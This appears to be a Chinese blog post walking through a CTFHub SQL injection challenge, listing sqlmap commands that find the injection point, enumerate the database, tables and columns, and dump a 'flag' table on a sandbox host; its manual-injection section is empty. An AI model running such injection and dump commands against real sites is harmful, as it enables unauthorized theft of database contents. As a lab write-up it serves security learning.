0
点赞
收藏
分享

微信扫一扫

SQL注入---数字型注入与字符型注入

绪风 2022-10-27 阅读 63
sql数据库sql导出数据云平台云计算


文章目录

  • ​​SQLMAP注入​​
  • ​​手动注入​​

SQLMAP注入

①判断注入点

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1”

发现是一个注入点

SQL注入---数字型注入与字符型注入_sql


②查询数据库

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” --current-db

SQL注入---数字型注入与字符型注入_导出数据_02

得到当前数据库sqli

③查询数据表(flag与news)

SQL注入---数字型注入与字符型注入_sql_03

④查询字段

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” --columns

SQL注入---数字型注入与字符型注入_导出数据_04

⑤导出数据
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” -C “flag” --dump

SQL注入---数字型注入与字符型注入_数据库sql_05

手动注入


举报

相关推荐

sql注入(数字型)

sql安全web安全

如何判断sql注入是字符型还是数字型?

sql数据库database

DoraBox-sql注入数字型

数据库数据表名虚拟化云计算

Pikachu-Sql Inject-数字型注入(GET)

qt开发语言c++

5-2从一个数字型注入认识sql注入漏洞

web安全

安鸾渗透实战平台|SQL数字型注入详细教程

sqlweb安全数据库

过滤脚本注入和SQL注入字符

SQL注入字符过滤脚本注入过滤字符串sql注入虚拟化云计算

SQL注入Cookie注入

网络安全sql安全

SQL注入Update注入

网络安全安全sql

pikachu靶场第十六关——sqli数字型注入(post)(附代码审计)

云计算大数据笔记
0 条评论